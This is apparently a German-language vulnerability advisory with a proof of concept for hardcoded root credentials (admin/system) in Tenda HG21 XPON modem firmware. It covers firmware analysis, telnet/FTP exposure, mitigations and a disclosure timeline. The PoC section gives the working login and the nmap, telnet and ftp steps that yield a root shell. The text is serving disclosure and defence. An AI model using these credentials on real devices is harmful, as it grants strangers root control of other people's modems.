
Proof-of-Concept, das hartcodierte Root-Zugangsdaten (admin/system) in der Firmware des Tenda HG21 XPON-Modems demonstriert und unbefugten Root-Zugriff über Telnet und FTP ermöglicht.
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2026-38577 |
| Hersteller | Tenda |
| Produkt | Tenda HG21 (XPON-Faser-Modem) |
| Betroffene Version | V4.0.0-260302 |
| Produktschlüssel | HG21-V1.0-TDE01 |
| Hardware-Version | V1.0 |
| Firmware-Build-Datum | 2026-03-02 |
| Firmware-Datei | US_HG21re_300002982_en_xpon_2.zip |
| Schwachstellenklasse | CWE-798: Verwendung hartcodierter Zugangsdaten |
| Entdecker | Anmol Singh Rajput — Unabhängiger Sicherheitsforscher |
| Offenlegungsstatus | Hersteller zum Zeitpunkt der CVE-Reservierung noch nicht benachrichtigt — 90-tägige Frist zur verantwortungsvollen Offenlegung gilt ab dem Datum der CVE-Vergabe |
Die Firmware-Analyse des Tenda HG21 XPON-Faser-Modems offenbarte ein hartcodiertes Administratorkonto, das in das ausgelieferte Firmware-Image eingebettet ist. Dem Konto werden volle Root-Rechte (UID 0) gewährt, und seine Zugangsdaten sind über alle Geräte hinweg statisch. Das bedeutet, dass jeder Angreifer, der einen exponierten Verwaltungsdienst auf einem verwundbaren Gerät erreichen kann, sich als Root authentifizieren kann, ohne das vom Kunden festgelegte Web-UI-Passwort zu kennen.
/etc/passwd in der extrahierten Firmware enthält einen admin-Eintrag
mit einem SHA256crypt-Passwort-Hash, der sich auf den statischen Wert
system auflöst.0 — d. h., es ist Root, kein eingeschränktes
Dienstkonto./etc/shadow vorhanden, sodass der schwache/statische Hash
in passwd das einzige Tor ist, das das Konto schützt./etc/inetd.conf startet telnetd und ftpd, beide als Root
ausgeführt, sodass das hartcodierte Konto über das Netzwerk erreichbar
ist, nicht nur über eine serielle/UART-Konsole.Ein Angreifer mit Netzwerkzugriff auf den Telnet-Dienst (TCP/23) oder
FTP-Dienst (TCP/21) eines verwundbaren Geräts kann sich mit dem statischen
Passwort als admin anmelden und eine Root-Shell bzw. Dateizugriff mit
Root-Rechten erhalten. Dies ermöglicht mindestens:
CVSS-Vektoren aus der ursprünglichen Einreichung (die Bewertung des Herstellers kann nach Veröffentlichung abweichen):
Dies ist ein zugangsdatenbasierter PoC — er demonstriert, dass das hartcodierte Konto authentifiziert und Root-Rechte gewährt, kein Speicherkorruptions-Exploit. Führen Sie dies nur gegen ein Gerät aus, das Ihnen gehört oder für das Sie ausdrücklich autorisiert sind.
# Firmware extrahieren (binwalk oder ein Hersteller-Tool Ihrer Wahl)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Die passwd-Datei lokalisieren und untersuchen
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
Eine erfolgreiche Anmeldung an einem der beiden Dienste liefert eine
Shell-/FTP-Sitzung mit Root-Rechten (id meldet uid=0(root)).
admin/system-Konto vollständig
entfernen oder zumindest ein eindeutiges, pro Gerät zufälliges Passwort
erzwingen, das beim ersten Start gesetzt wird (nicht allein aus der
Seriennummer ableitbar).telnetd/ftpd standardmäßig deaktivieren; eine ausdrückliche
Opt-in-Entscheidung und ein authentifizierter, verschlüsselter Kanal
(SSH/SFTP) für die Fernverwaltung erforderlich machen.| Datum | Ereignis |
|---|---|
| 2026-03-02 | Verwundbarer Firmware-Build veröffentlicht |
| — | Entdeckt während einer unabhängigen Firmware-Analyse |
| 2026-04-09 | CVE-2026-38577 über MITRE reserviert |
| — | Benachrichtigung des Herstellers ausstehend (90-tägiges Offenlegungsfenster ab CVE-Vergabe) |
Entdeckt und gemeldet von: